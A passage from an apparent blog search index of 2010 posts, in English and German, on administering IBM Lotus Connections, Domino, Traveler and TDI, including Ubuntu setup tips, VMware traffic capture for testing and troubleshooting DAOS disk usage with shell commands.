Integrator don’t start without this lib\nRemap SH In Ubuntu /bin/sh links to dash, this makes a lot of troubles with IBM Software. You can change it with dpkg-reconfigure dash and answer the question with no, then /bin/sh links to bash.\nTest environment My demo installation are to vmware machines in Vmware Fusion. System1: Domino.stoeps.de (Domino Server, LDAP), System2: connections.stoeps.de (All in one installation: WAS, TDI, DB2, IHS, LCS).\nNetwork configuration Domino ]\nDomino works great with this fake loopback device in /etc/hosts:\n]\nConnections ]\nWAS will not start with fake loopback, so here the /etc/hosts:\n]\nInstallation Installation was pretty easy, when you know the installation process of connections 2.5. IBM made a lot of points simpler and i got only one error with the database wizard, but i could manage it with the sql scripts.\nto be continued … ","excerpt":"\u003cp\u003eMany people know, that i prefer Ubuntu for my testing environments and\nseveral production servers. So one of my first tries to install\n\u003ca href=\"http://www.ibm.com/software/lotus/products/connections/\" target=\"_blank\"\u003eLotus\nConnections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 3.0 was on\n\u003ca href=\"https://help.ubuntu.com/community/Server/TechSpecs/1004LTS\" target=\"_blank\"\u003eUbuntu 10.04\nLTS \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eBest thing in Ubuntu is the package management with aptitude or apt\n(First developed from \u003ca href=\"http://www.debian.org\" target=\"_blank\"\u003eDebian GNU/Linux\nCommunity \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n). It is easy to use and powerful in installation and upgrade\nprocesses.\u003c/p\u003e\n\u003ch1 id=\"ubuntu-1004-lts-server-installation\"\u003eUbuntu 10.04 LTS Server Installation \u003ca href=\"#ubuntu-1004-lts-server-installation\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eInstalled Standard Server 64 Bit with \u003ca href=\"http://www.openssh.org\" target=\"_blank\"\u003eOpenSSH \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n,\nnothing else. After the first start i prepared network, dns and\n/etc/hosts.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFirst hint:\u003c/strong\u003e Ubuntu normaly includes a line in the /etc/hosts with\n127.0.1.1 \u003cem\u003ehostname\u003c/em\u003e. I got an error on the first Websphere Application\nServer start, so i changed this line to the ip address of my host and\nthe hostname.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-11-30-ibm-lotus-connections-3-0-on-ubuntu-server-10-04/","title":"IBM Lotus Connections 3.0 on Ubuntu Server 10.04"},{"body":"You can download Connections 3 now on Passport Advantage! In the moment i can’t find the images in the BP Software Access Catalog.\nUpdate:\nDownload is available in the Software Access Catalog now.\nSocialize Me: Lotus Connections 3.0 Available for Download .\n","excerpt":"\u003cp\u003eYou can download Connections 3 now on Passport Advantage! In the moment\ni can’t find the images in the BP Software Access Catalog.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eUpdate:\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eDownload is available in the Software Access Catalog now.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.lbenitez.com/2010/11/lotus-connections-30-available-for.html\" target=\"_blank\"\u003eSocialize\nMe: Lotus Connections 3.0 Available for Download \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-11-24-socialize-me-lotus-connections-3-0-available-for-download/","title":"Socialize Me: Lotus Connections 3.0 Available for Download"},{"body":"Documentation is not populated in an Infocenter. There is a new wiki.\nHope this works better then the Traveler 8.5.2 wiki.\nhttp://www.curiousmitch.com/CuriousMitch/mitch2.nsf ","excerpt":"\u003cp\u003eDocumentation is not populated in an Infocenter. There is a new wiki.\u003c/p\u003e\n\u003cp\u003eHope this works better then the Traveler 8.5.2 wiki.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.curiousmitch.com/CuriousMitch/mitch2.nsf\" target=\"_blank\"\u003ehttp://www.curiousmitch.com/CuriousMitch/mitch2.nsf \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-11-23-mitch-cohen-connections-3-documentation/","title":"Mitch Cohen – Connections 3 Documentation"},{"body":"Ed Brill – Lotus Notes Traveler for Android will be a holiday present .\nEd Brill anounced the shipping of Android Support in IBM Lotus Traveler.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/dx/lotus-notes-traveler-for-android-will-be-a-holiday-present\" target=\"_blank\"\u003eEd\nBrill – Lotus Notes Traveler for Android will be a holiday present \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eEd Brill anounced the shipping of Android Support in IBM Lotus Traveler.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-11-23-ed-brill-lotus-notes-traveler-for-android-will-be-a-holiday-present/","title":"Ed Brill – Lotus Notes Traveler for Android will be a holiday present"},{"body":"In the Domino documentation of Security Settings there is a point, that you can add a link to the “Forgot your Password” prompt of the Notes client screen. Finally i tested this feature, because i can’t find any further information, how the code should look like.\nSo i created the security setting document for my users, with a link:\nThe result was a login screen with my html code in the textbox:\nWhen i wrote the html tags in capitals, the link is been generated. So remind, that you use capitals as tags.\nHere is my final example setting:\nOne more bug feature is, that the mouse cursor don’t change, when you hover over the link.\n","excerpt":"\u003cp\u003eIn the Domino documentation of Security Settings there is a point, that\nyou can add a link to the “Forgot your Password” prompt of the Notes\nclient screen. Finally i tested this feature, because i can’t find any\nfurther information, how the code should look like.\u003c/p\u003e\n\u003cfigure\u003e\u003ca href=\"/images/2010/09/login_ok.png\"\u003e\u003cimg src=\"/images/2010/09/login_ok.png\"\u003e\u003c/a\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eSo i created the security setting document for my users, with a link:\u003c/p\u003e\n\u003cfigure\u003e\u003ca href=\"/images/2010/09/setting_notok.png\"\u003e\u003cimg src=\"/images/2010/09/setting_notok.png\"\u003e\u003c/a\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eThe result was a login screen with my html code in the textbox:\u003c/p\u003e\n\u003cfigure\u003e\u003ca href=\"/images/2010/09/login_notok.png\"\u003e\u003cimg src=\"/images/2010/09/login_notok.png\"\u003e\u003c/a\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eWhen i wrote the html tags in capitals, the link is been generated. So\nremind, that you use capitals as tags.\u003c/p\u003e\n\u003cp\u003eHere is my final example setting:\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-09-20-adding-a-link-to-forgot-your-password-prompt-in-notes-login-screen/","title":"Adding a Link to “Forgot your Password?” Prompt in Notes Login Screen"},{"body":"Volker wrote an article on using Lotus Notes privately and legal. One point is using it without a domino server connection. See original post: http://vowe.net/archives/011655.html Posted from WordPress for Android\n","excerpt":"\u003cp\u003eVolker wrote an article on using Lotus Notes privately and legal. One\npoint is using it without a domino server connection. See original post:\n\u003ca href=\"http://vowe.net/archives/011655.html\" target=\"_blank\"\u003ehttp://vowe.net/archives/011655.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003ePosted from WordPress for Android\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-08-17-using-lotus-notes-free-and-legal/","title":"Using Lotus Notes free and legal"},{"body":"http://feedproxy.google.com/ r/netways/3/PTeIDeaSRYo/\nPosted from WordPress for Android\n","excerpt":"\u003cp\u003e\u003ca href=\"http://feedproxy.google.com/\" target=\"_blank\"\u003ehttp://feedproxy.google.com/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003csub\u003er/netways/\u003c/sub\u003e3/PTeIDeaSRYo/\u003c/p\u003e\n\u003cp\u003ePosted from WordPress for Android\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-08-01-private-cloud-just-computers/","title":"Private Cloud – just computers"},{"body":"http://www.bleedyellow.com/blogs/lotusnut/entry/moresecurehttppassword?lang=en_us Posted from WordPress for Android\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.bleedyellow.com/blogs/lotusnut/entry/moresecurehttppassword?lang=en_us\" target=\"_blank\"\u003ehttp://www.bleedyellow.com/blogs/lotusnut/entry/moresecurehttppassword?lang=en_us \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003ePosted from WordPress for Android\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-16-more-secure-httppassword-on-domino/","title":"More secure httppassword on Domino"},{"body":"Now with Mac and Linux Support!\nhttp://www.openntf.org/Projects/pmt.nsf/HomeLookup/45E037507A3781298625776200215C74 ]1 ","excerpt":"\u003cp\u003eNow with Mac and Linux Support!\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.openntf.org/Projects/pmt.nsf/HomeLookup/45E037507A3781298625776200215C74\" target=\"_blank\"\u003ehttp://www.openntf.org/Projects/pmt.nsf/HomeLookup/45E037507A3781298625776200215C74 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n]\u003ca href=\"http://www.openntf.org/Projects/pmt.nsf/HomeLookup/45E037507A3781298625776200215C74\" target=\"_blank\"\u003e1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-16-new-version-1-4-of-wildfire-on-openntf-2/","title":"New Version 1.4 of Wildfire on Openntf"},{"body":"Here you can find two ideas of http://www.ideajam.net , which i support and i want to ask you, that you support them too.\n","excerpt":"\u003cp\u003eHere you can find two ideas of \u003ca href=\"http://www.ideajam.net\" target=\"_blank\"\u003ehttp://www.ideajam.net \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which i support\nand i want to ask you, that you support them too.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-11-ideajam-please-support-ts-and-xenapp-6/","title":"Ideajam: please support TS and Xenapp 6"},{"body":"Domino Power Magazine: Setting IHS Default to be Connections Homepage Update On my Connections 2.5 Install i had no success with this tipp! I don’t know why, but i don’t get forwarded.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.dominopower.com/newsitems/00049664.html\" target=\"_blank\"\u003eDomino Power\nMagazine: Setting IHS Default to be Connections Homepage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eOn my Connections 2.5 Install i had no success with this tipp! I don’t\nknow why, but i don’t get forwarded.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-05-setting-ihs-default-to-connections-homepage-2/","title":"Setting IHS Default to Connections Homepage"},{"body":"Bleedyellow: Are you still having Winmail.dat issues .\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.bleedyellow.com/blogs/NotesShop/entry/are_you_still_having_winmail_dat_issues7?lang=en_us\u0026amp;utm_source=twitterfeed\u0026amp;utm_medium=twitter\" target=\"_blank\"\u003eBleedyellow:\nAre you still having Winmail.dat issues \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n .\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-05-avoiding-winmail-dat-issues/","title":"Avoiding winmail.dat issues"},{"body":"DominoPower Magazine: Setting IHS Default to be Connections Homepage ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.dominopower.com/newsitems/00049664.html\" target=\"_blank\"\u003eDominoPower Magazine:\nSetting IHS Default to be Connections Homepage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-07-02-setting-ihs-default-to-connections-homepage/","title":"Setting IHS Default to Connections Homepage"},{"body":"On Daniel Nasheds Blog you can read about timeout issues with iOS4 and Traveler 8.5.2 Beta:\nTraveler with iPhone iOS4 timing issues ","excerpt":"\u003cp\u003eOn Daniel Nasheds Blog you can read about timeout issues with iOS4 and\nTraveler 8.5.2 Beta:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://blog.nashcom.de/nashcomblog.nsf/dx/traveler-with-iphone-ios4-timing-issues.htm\" target=\"_blank\"\u003eTraveler\nwith iPhone iOS4 timing issues \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-06-25-nashcom-traveler-timeouts-with-ios4/","title":"Nashcom: Traveler timeouts with iOS4"},{"body":"Here you can read closed SPR and Fixes: Lotus iNotes Interim Fix 304.5aCHF1 for Domino 8.5.1 Fix Pack 3 ","excerpt":"\u003cp\u003eHere you can read closed SPR and Fixes:\n\u003ca href=\"http://www.ibm.com/support/docview.wss?uid=swg21438583\u0026amp;myns=swglotus\u0026amp;mynp=OCSSULMR\u0026amp;mynp=OCSSKTMJ\u0026amp;mync=R\" target=\"_blank\"\u003eLotus\niNotes Interim Fix 304.5aCHF1 for Domino 8.5.1 Fix Pack 3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-06-25-interim-fix-304-5achf1-for-inotes-8-5-1-fp3-available/","title":"Interim Fix 304.5aCHF1 for iNotes 8.5.1 FP3 available"},{"body":"FP4 for Tivoli Directory Integrator is available for download on IBM Fix Central .\nInstall command: TDI _Install_Dir/bin/applyUpdates.bat -update Fixpack.zip\n","excerpt":"\u003cp\u003eFP4 for Tivoli Directory Integrator is available for download on\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral/\" target=\"_blank\"\u003eIBM Fix Central \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eInstall command:\n\u003ccode\u003eTDI _Install_Dir/bin/applyUpdates.bat -update Fixpack.zip\u003c/code\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-fixpack-4-for-tdi-7-0/","title":"Fixpack 4 for TDI 7.0"},{"body":"So, now I finally found a plugin that allows me to create bilingual articles. In the future I will, if possible, create posts in english too. You can select the language via the drop-down list in the right column.\n","excerpt":"\u003cp\u003eSo, now I finally found a plugin that allows me to create bilingual\narticles. In the future I will, if possible, create posts in english\ntoo. You can select the language via the drop-down list in the right\ncolumn.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-blogposts-in-english-too/","title":"Blogposts in english too"},{"body":"So, jetzt hab ich endlich ein Plugin, mit dem sich zweisprachige Artikel einigermaßen komfortabel erstellen lassen. In Zukunft wird es, wenn möglich, meine Posts auch in englisch geben. Auswahl erfolgt über die Dropdown-Liste am rechten Rand.\n","excerpt":"\u003cp\u003eSo, jetzt hab ich endlich ein Plugin, mit dem sich zweisprachige Artikel\neinigermaßen komfortabel erstellen lassen. In Zukunft wird es, wenn\nmöglich, meine Posts auch in englisch geben. Auswahl erfolgt über die\nDropdown-Liste am rechten Rand.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-artikel-jetzt-auch-in-englisch/","title":"Artikel jetzt auch in englisch"},{"body":"Nicht vergessen! Das Notes- und Domino-Programmverzeichnis in die Pfad-Variable aufnehmen! Bzw. das Verzeichnis in der die notes.ini liegt. Ansonsten produzieren Verbindungen mit Local Server oder Local Client die komischsten Java-Fehler.\n","excerpt":"\u003cp\u003eNicht vergessen! Das Notes- und Domino-Programmverzeichnis in die\nPfad-Variable aufnehmen! Bzw. das Verzeichnis in der die notes.ini\nliegt. Ansonsten produzieren Verbindungen mit Local Server oder Local\nClient die komischsten Java-Fehler.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-tivoli-directory-integrator-domino-connect-2/","title":"Tivoli Directory Integrator – Domino Connect"},{"body":"For my records: Do not forget to add the directory of your notes.ini (normally the Notes or Domino program folder) to the path variable! Very strange errors appear, when you want to connect to Local Server or Local Client.\n","excerpt":"\u003cp\u003eFor my records: Do not forget to add the directory of your notes.ini\n(normally the Notes or Domino program folder) to the path variable! Very\nstrange errors appear, when you want to connect to Local Server or Local\nClient.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-tivoli-directory-integrator-domino-connect/","title":"Tivoli Directory Integrator – Domino Connect"},{"body":"Während meiner Tests mit Lotus Traveler, den ich in VMware Fusion installiert habe, wollte ich den Traffic zwischen Android Simulator, Windows Mobile Simulator und iPhone Simulator mitsniffen. Unter Linux und Windows war das kein Problem, da die virtuellen Netzwerkkarten in Wireshark auftauchen und zum Aufzeichnen des Netzwerkverkehrs ausgewählt werden können.\nUnter Mac OS X Snow Leopard und Wireshark funktioniert das leider nicht.\nUnter folgendem Pfad sind alle notwendigen Tools enthalten: /Library/Application\\ Support/VMware\\ Fusion/, mit vmnet-sniffer können die Netzwerkpakete mitgelesen werden. Um einfacher auf den Sniffer zugreifen zu können, habe ich mir einen Link in /usr/bin erstellt: ln -s /Library/Application\\ Support/VMware\\ Fusion/vmnet-sniffer /usr/bin\nJetzt kann mit vmnet-sniffer -i vmnet1 -w xyz.pcap eine für Wireshark lesbare Datei erstellt werden.\n","excerpt":"\u003cp\u003eWährend meiner Tests mit Lotus Traveler, den ich in VMware Fusion installiert habe, wollte ich den Traffic zwischen Android Simulator, Windows Mobile Simulator und iPhone Simulator mitsniffen. Unter Linux und Windows war das kein Problem, da die virtuellen Netzwerkkarten in Wireshark auftauchen und zum Aufzeichnen des Netzwerkverkehrs ausgewählt werden können.\u003c/p\u003e\n\u003cp\u003eUnter Mac OS X Snow Leopard und Wireshark funktioniert das leider nicht.\u003c/p\u003e\n\u003cp\u003eUnter folgendem Pfad sind alle notwendigen Tools enthalten:\n\u003ccode\u003e/Library/Application\\ Support/VMware\\ Fusion/\u003c/code\u003e, mit \u003ccode\u003evmnet-sniffer\u003c/code\u003e\nkönnen die Netzwerkpakete mitgelesen werden. Um einfacher auf den\nSniffer zugreifen zu können, habe ich mir einen Link in \u003ccode\u003e/usr/bin\u003c/code\u003e\nerstellt:\n\u003ccode\u003eln -s /Library/Application\\ Support/VMware\\ Fusion/vmnet-sniffer /usr/bin\u003c/code\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-03-16-vmware-fusion-virtuelle-netzwerkkarte-sniffen/","title":"VMware Fusion: Virtuelle Netzwerkkarte sniffen"},{"body":"Luis Benitez schrieb heute im Socialize Me Blog einen kurzen Beitrag, wie man die Status Updates von Lotus Connections in Sharepoint anzeigen kann. Ich hab jetzt leider keinen Sharepoint greifbar, aber laut Luis ist es eine Sache von etwa 5 Minuten.\nTo add to that, I thought it would be interesting to see if I could bring Lotus Connections’ microblogging capability to Sharepoint.\nHier gehts zum Artikel. ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.lbenitez.com\" target=\"_blank\"\u003eLuis Benitez \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n schrieb heute im\n\u003ca href=\"http://www.lbenitez.com\" target=\"_blank\"\u003eSocialize Me Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n einen kurzen Beitrag, wie man\ndie Status Updates von Lotus Connections in Sharepoint anzeigen kann.\nIch hab jetzt leider keinen Sharepoint greifbar, aber laut Luis ist es\neine Sache von etwa 5 Minuten.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eTo add to that, I thought it would be interesting to see if I could\nbring Lotus Connections’ microblogging capability to Sharepoint.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.lbenitez.com/2010/01/lotus-connections-status-updates-comes.html\" target=\"_blank\"\u003eHier\ngehts zum Artikel. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-27-lotusconnections_status_in_sharepoint/","title":"Lotus Connections Status Updates in Sharepoint integrieren"},{"body":"Gestern ist der Fixpack 1 für Lotus Notes / Domino 8.5.1 erschienen. Es wird jetzt offiziell Windows 7 und Mac OS X 10.6 (Snow Leopard) unterstützt.\nIch habe es mir am Mac installiert und bin gespannt, ob es sich auf die Stabilität auswirkt. Behoben ist ein Problem mit Gif-Animationen im integrierten Sametime-Client (SPR# SHET7X7NWH – Crash in Sametime while animating a GIF leads to consistent crash at Notes startup).\nMal sehen, ob auch die Probleme mit der “Geographic Location” nicht mehr auftauchen.\nHier die komplette Liste der behobenen Probleme.\n","excerpt":"\u003cp\u003eGestern ist der Fixpack 1 für Lotus Notes / Domino 8.5.1 erschienen. Es\nwird jetzt offiziell Windows 7 und Mac OS X 10.6 (Snow Leopard)\nunterstützt.\u003c/p\u003e\n\u003cp\u003eIch habe es mir am Mac installiert und bin gespannt, ob es sich auf die\nStabilität auswirkt. Behoben ist ein Problem mit Gif-Animationen im\nintegrierten Sametime-Client (SPR# SHET7X7NWH – Crash in Sametime while\nanimating a GIF leads to consistent crash at Notes startup).\u003c/p\u003e\n\u003cp\u003eMal sehen, ob auch die Probleme mit der “Geographic Location” nicht mehr\nauftauchen.\u003c/p\u003e\n\u003cp\u003eHier die komplette Liste der behobenen Probleme.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-24-fixpack-1-fur-notes-8-5-1-erschienen/","title":"Fixpack 1 für Notes 8.5.1 erschienen"},{"body":"bfa_ata_body_title:\nDAOS läßt Platte überlaufen bfa_ata_body_title_multi: DAOS läßt Platte überlaufen Die Serverplatte eines Domino 8.5.1 (Suse 10.2) lief über, es war auf der Partition auf der Notes installiert ist, kein Plattenplatz mehr verfügbar.\nMittels du -hs /local/notesdata und anschliessendem du -hs /local/notesdata/DAOS wurde das Verzeichnis /local/notesdata/DAOS/0002 als Hauptverursacher (220 GB belegt) gefunden. Eine nähere Betrachtung des Verzeichnisses zeigt eine größere Anzahl von gleich großen Files (jedes 50 MB groß).\nIch lies mir das Directory mit ls -l -S nach Größe sortiert anzeigen (less ist hier des Admins Freund), also besser gleich ls -l -S | less.\nDer Befehl ls -l | grep 51013949 | wc -l brachte die Anzahl 4300, es waren also ca. 210 GB Dateien á 50 MB vorhanden. DAOS ist nur für das Verzeichnis mail aktiviert und es gibt eine Größenbeschränkung für Mails größer 20 MB. Das Erstellungsdatum der Files erstreckt sich über die letzten 4 Wochen. Befehle wie te daosmgr prune 5 brachten keinerlei Löschvorgänge. Die letzten nlo-Dateien die erstellt wurden, sind 2 Tage alt und vom Samstag, es sind aber auch nlo von Anfang Dezember vorhanden.\nDie Dateinamen waren natürlich unterschiedlich, aber die letzten 8 Zeichen waren bei allen gleich. Ich vermute, daß von einer Datei die Prüfsumme variert, da alle 4300 Dateien bitgleich groß sind. Mir ist leider kein Befehl bekannt, mit dem man feststellen kann, zu welcher Notes-Datenbank ein nlo eine Verknüpfung hat. Daher das nächste Skript:\nSchreibe alle verknüpften nlos in Textfiles: (als User Notes)\ncd /local/notesdata/mail; for i in \\`ls -l | awk '{print $8}\\ ; do /opt/ibm/lotus/bin/server -c \u0026ldquo;te daosmgr listnlo -O $i.txt ALL mail/$i\u0026rdquo;`\nMal sehen, ob einer der Dateinamen vorkommt:\nfor i in \\`ls -l | grep 51013949 | print '{print $8}'\\ ; do grep $i *.nsf.txt; done`\nJe nachdem, ob die Kommandos als Benutzer root oder notes ausgeführt werden, muß print $8 mit print $9 ersetzt werden.\nInteressanterweise gab es keine Treffer. Ich habe nicht herausgefunden, woher die Dateien kamen. Um den Server zu entlasten, wurden ein paar der Files gesichert und der Rest gelöscht.\nObwohl also keine verknüpften Datenbanken gefunden werden, werden diese mit te daosmgr prune 5 nicht gelöscht.\nEine nähere Fehleranalyse erfolgt die nächsten Tage, ich werden den DAOS Katalog neu aufbauen, DAOS nochmal deaktivieren und neu einrichten.\nSollten wieder die gleichen Dateien auftauchen, werde ich die Verschlüsselung der nlos deaktivieren und versuchen herauszufinden, um was für Dateien es sich handelt.\nAber vielleicht hat ja einer meiner Leser eine Idee zur Ursache, da sich auch das Domino Wiki und die IBM Knowledgebase zu dem Fehler nicht äussern. Wobei der Blogeintrag vorallem als Gedächtnisstütze für mich gedacht ist, damit ich mir das nächste Mal die For-Schleifen nicht wieder neu erfinden muss.\n","excerpt":"\u003cp\u003ebfa_ata_body_title:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDAOS läßt Platte überlaufen\nbfa_ata_body_title_multi:\u003c/li\u003e\n\u003cli\u003eDAOS läßt Platte überlaufen\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003cp\u003eDie Serverplatte eines Domino 8.5.1 (Suse 10.2) lief über, es war auf\nder Partition auf der Notes installiert ist, kein Plattenplatz mehr\nverfügbar.\u003c/p\u003e\n\u003cp\u003eMittels \u003ccode\u003edu -hs /local/notesdata\u003c/code\u003e und anschliessendem\n\u003ccode\u003edu -hs /local/notesdata/DAOS\u003c/code\u003e wurde das Verzeichnis\n\u003ccode\u003e/local/notesdata/DAOS/0002\u003c/code\u003e als Hauptverursacher (220 GB belegt)\ngefunden. Eine nähere Betrachtung des Verzeichnisses zeigt eine größere\nAnzahl von gleich großen Files (jedes 50 MB groß).\u003c/p\u003e\n\u003cp\u003eIch lies mir das Directory mit \u003ccode\u003els -l -S\u003c/code\u003e nach Größe sortiert anzeigen\n(less ist hier des Admins Freund), also besser gleich \u003ccode\u003els -l -S | less\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eDer Befehl \u003ccode\u003els -l | grep 51013949 | wc -l\u003c/code\u003e brachte die Anzahl 4300, es\nwaren also ca. 210 GB Dateien á 50 MB vorhanden. DAOS ist nur für das\nVerzeichnis mail aktiviert und es gibt eine Größenbeschränkung für Mails\ngrößer 20 MB. Das Erstellungsdatum der Files erstreckt sich über die\nletzten 4 Wochen. Befehle wie te daosmgr prune 5 brachten keinerlei\nLöschvorgänge. Die letzten nlo-Dateien die erstellt wurden, sind 2 Tage\nalt und vom Samstag, es sind aber auch nlo von Anfang Dezember\nvorhanden.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-18-daos-last-platte-uberlaufen/","title":"DAOS läßt Platte überlaufen"},{"body":"bfa_ata_body_title:\nIch mag Symphony, aber …​ bfa_ata_body_title_multi: Ich mag Symphony, aber …​ tags:\nWarren Elsmore hat einen neuen Blog-Post zu Symphony und Keynote verfasst. Er spricht mir dabei aus der Seele, man kann eigentlich nichts hinzufügen. Ich steh auf Keynote für Präsentationen!\nElsmore.net :: I like Symphony, but … ","excerpt":"\u003cp\u003ebfa_ata_body_title:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIch mag Symphony, aber …​\nbfa_ata_body_title_multi:\u003c/li\u003e\n\u003cli\u003eIch mag Symphony, aber …​\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003etags:\u003c/p\u003e\n\u003cp\u003eWarren Elsmore hat einen neuen Blog-Post zu Symphony und Keynote\nverfasst. Er spricht mir dabei aus der Seele, man kann eigentlich nichts\nhinzufügen. Ich steh auf Keynote für Präsentationen!\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.elsmore.net/warren/blog.nsf/d6plinks/WELE-7ZLNUF\" target=\"_blank\"\u003eElsmore.net\n:: I like Symphony, but … \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-11-ich-mag-symphony-aber/","title":"Ich mag Symphony, aber …"},{"body":"bfa_ata_body_title:\n\u0026lsquo;Domino: Directory Independence wird nicht fortgeführt\u0026rsquo; bfa_ata_body_title_multi: \u0026lsquo;Domino: Directory Independence wird nicht fortgeführt\u0026rsquo; Schöner Mist, genau das Feature das wirklich von vielen herbeigesehnt wird und auch die Lösung für verschiedene Probleme wäre, wird von IBM nur in den Hosted Services fortgeführt, wird aber seinen Weg nicht in Domino finden. Sehr schade!\n[…] _\nThe intent of the Domino Directory Independence (DI) capability was to enable Notes and Domino to store person and group information exclusively in an LDAP Directory. This was a significant initiative undertaken by the Domino Development team, specifically, DI had the goal of easing the burden for administrators who deploy and manage multiple directories. We have made the business decision to leverage DI in IBM’s hosted offerings, but there are no plans to provide this Directory Independence capability in Domino.\n[…] _\naus Technote 21416004 Links: What is the future of the Domino Directory Independence capability? Elsmore.net: Directory Independance is dead (in case you didn’t know) ","excerpt":"\u003cp\u003ebfa_ata_body_title:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026lsquo;Domino: Directory Independence wird nicht fortgeführt\u0026rsquo;\nbfa_ata_body_title_multi:\u003c/li\u003e\n\u003cli\u003e\u0026lsquo;Domino: Directory Independence wird nicht fortgeführt\u0026rsquo;\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003cp\u003eSchöner Mist, genau das Feature das wirklich von vielen herbeigesehnt\nwird und auch die Lösung für verschiedene Probleme wäre, wird von IBM\nnur in den Hosted Services fortgeführt, wird aber seinen Weg nicht in\nDomino 